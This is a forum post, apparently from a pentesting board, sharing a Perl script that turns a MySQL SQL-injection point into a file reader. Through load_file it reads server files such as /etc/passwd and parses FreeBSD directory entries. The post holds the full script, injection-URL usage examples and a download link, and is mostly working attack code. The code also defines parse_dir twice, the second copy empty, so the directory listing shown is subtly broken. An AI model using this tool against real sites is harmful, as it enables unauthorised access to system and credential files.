Results 1 to 1 of 1

Thread: dump_bsd_dir.pl: Dump bsd entries with mysql load_file

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    Jun 2010
    Posts
    1

    Post dump_bsd_dir.pl: Dump bsd entries with mysql load_file

    Well , we all konw that when SQL Injection happens on the freebsd system, we can use Load_file to get the conent of the dir entries. This following script disassemble the load_file return value and print out the dir conents, so we donnot need to view->browser the source...

    Source:Dump bsd entries with mysql load_file

    Usage:
    Code:
    xi4oyu@3xpl4b:~$ perl dump_bsd_dir.pl
    dump_bsd_dir : List freebsd DIRS USE load_file with MYSQL
    By xi4oyu evil.xi4oyu#gmail.com
    http://www.pentestday.com
    
    usage: dump_bsd_dir.pl [options]
    -u : Inject url
    -d|-f : DIR/FILE to list
    Ext: dump_bsd_dir.pl -u http://www.xxx.com/index.php?id=-1/**/union/**/select/**/1,****BSD,3 -d /etc
    dump_bsd_dir.pl -u http://www.xxx.com/index.php?id=-1/**/union/**/select/**/1,****BSD,3 -f /etc/passwd

    Code:
    #!/usr/bin/perl
    use LWP::UserAgent;
    use strict;
    use Getopt::Std;
    use vars qw / %opt /;
     
    use constant True => 1;
     
    my $rep_word = "****BSD";
    my $sep_flag = "%!!";
    my $user_agent = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;.NET CLR 1.1.4122)";
    my $target = '';
    my $target_rep = '';
    my $dir = '';
    my $file = '';
     
    sub usage{
     
    print STDERR <<"EOF";
    dump_bsd_dir : List freebsd DIRS USE load_file with MYSQL
    By xi4oyu evil.xi4oyu#gmail.com
    http://www.pentestday.com
     
    usage: $0 [options] 
    -u	: Inject url
    -d|-f   : DIR/FILE to list
    Ext: $0 -u http://www.xxx.com/index.php?id=-1/**/union/**/select/**/1,****BSD,3 -d /etc
         $0 -u http://www.xxx.com/index.php?id=-1/**/union/**/select/**/1,****BSD,3 -f /etc/passwd
     
    EOF
    	exit;
     
    }
     
     
    sub hex_str{
    	my $hex_str = shift;
    	my $hexed_str = "0x";
    	$hexed_str .= unpack("H*",$hex_str);
    	return $hexed_str;
     
    }
     
     
     
    #This function parsed freebsd dirent struct and print out result
     
    =pod
    	src/sys/sys/dirent.h
    	Ref:http://fxr.watson.org/fxr/source/sys/dirent.h?v=FREEBSD7
       49 
       50 struct dirent {
       51         __uint32_t d_fileno;            /* file number of entry */
       52         __uint16_t d_reclen;            /* length of this record */
       53         __uint8_t  d_type;              /* file type, see below */
       54         __uint8_t  d_namlen;            /* length of string in d_name */
       55 #if __BSD_VISIBLE
       56 #define MAXNAMLEN       255
       57         char    d_name[MAXNAMLEN + 1];  /* name must be no longer than this */
       58 #else
       59         char    d_name[255 + 1];        /* name must be no longer than this */
       60 #endif
       61 };
       62 
       63 #if __BSD_VISIBLE
       64 /*
       65  * File types
       66  */
       67 #define DT_UNKNOWN       0
       68 #define DT_FIFO          1
       69 #define DT_CHR           2
       70 #define DT_DIR           4
       71 #define DT_BLK           6
       72 #define DT_REG           8
       73 #define DT_LNK          10
       74 #define DT_SOCK         12
       75 #define DT_WHT          14
     
    =cut
     
    sub parse_dir{
     
    	my $dirent_hex = shift;	
    	#skip 48 
    	my $dir = substr($dirent_hex,48);
    	my $ent_len = 9;
    	my $index = 0;
     
    	while( True ){
     
    		my $header = substr($dir,$index,16);
    		my ($inode,$ent_len,$ent_type,$name_len) = unpack("LSCC",pack("H*",$header));
    		last if $ent_len == 0;	
    		my $name = substr($dir,$index+16,$name_len * 2);
    		my $str_name = unpack("a*",pack("H*",$name));	
    		my $type = "file:";
    		if($ent_type == 4){
    			$type = "dir:";
    			$str_name .= "/";
     
    		}elsif($ent_type == 10){
    			$type = "link:";
     
    		}elsif($ent_type == 1){
    			$type = "fifo:";
    		}elsif($ent_type == 12){
    			$type = "socket:";
    		}elsif($ent_type == 6){
    			$type = "blk:";
    		}
    		print "$type\t$str_name\n";
     
    		$index += 2* $ent_len;
     
    	}
     
    }
     
    sub get_that_shit{
    	my $hexed_str = shift;
    	my $url = $target;
    	$url =~ s/$rep_word/$hexed_str/g;
     
    	#print $url;
    	my $ua = LWP::UserAgent->new;
     
            $ua->agent("$user_agent");
     
            my $req = HTTP::Request->new(GET => "$url");
            my $rest = $ua->request($req);
    	my $content = $rest->content;		
    	#print $content;
    	my $ret = "ERROR";
    	#print $sep_flag;
    	if( $content =~ /$sep_flag(.*)$sep_flag/sg){
    		$ret = $1;	
    	}
    	return $ret;
     
    }
     
    sub parse_dir{
     
    	my $hex_code = shift;
     
    }
     
    #================================================================#
    #Here We Go!
     
    my $opt_string = "u:d:f:";
     
    usage if $#ARGV < 0;
     
    getopts("$opt_string",\%opt) or usage();
    usage if $opt{h}; 
     
    $target = $opt{u} if $opt{u};
    $dir = $opt{d} if $opt{d};
    $file = $opt{f} if $opt{f};
     
    if(!$target || (!$dir && !$file)){
    	usage();
    }
     
    my $hexed_str = "";
     
    my $sep_flag_hex = hex_str($sep_flag);
    if($dir){
    	 $hexed_str = "hex(concat($sep_flag_hex,load_file(".hex_str($dir)."),$sep_flag_hex))";
    }else{
     
    	 $hexed_str = "concat($sep_flag_hex,load_file(".hex_str($file)."),$sep_flag_hex)";
    }
     
    #print $hexed_str."\n";
    my $ret_str = get_that_shit($hexed_str);	
     
    if($file){
     
    	print $ret_str;
     
    }else{
    	parse_dir($ret_str);
     
    }
    You can download the full source here:
    http://www.linuxpentest.com/tools/sq...sd_entries.tgz
    Last edited by akshell; 06-28-2010 at 12:04 PM.

Similar Threads

  1. Opening Kismet dump
    By nubzy in forum OLD Newbie Area
    Replies: 0
    Last Post: 07-20-2009, 10:09 PM
  2. creating /dev entries for block devices ??
    By Si2006 in forum OLD BT3final Support
    Replies: 2
    Last Post: 06-23-2009, 06:38 PM
  3. Dump remote SAM from within metasploit?
    By Dissident85 in forum OLD Pentesting
    Replies: 6
    Last Post: 09-20-2008, 08:34 AM
  4. kismet dump files
    By thucar in forum OLD Newbie Area
    Replies: 4
    Last Post: 08-27-2008, 07:22 AM
  5. Kismet dump file
    By dumbNlazy in forum OLD Newbie Area
    Replies: 5
    Last Post: 07-26-2008, 10:20 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •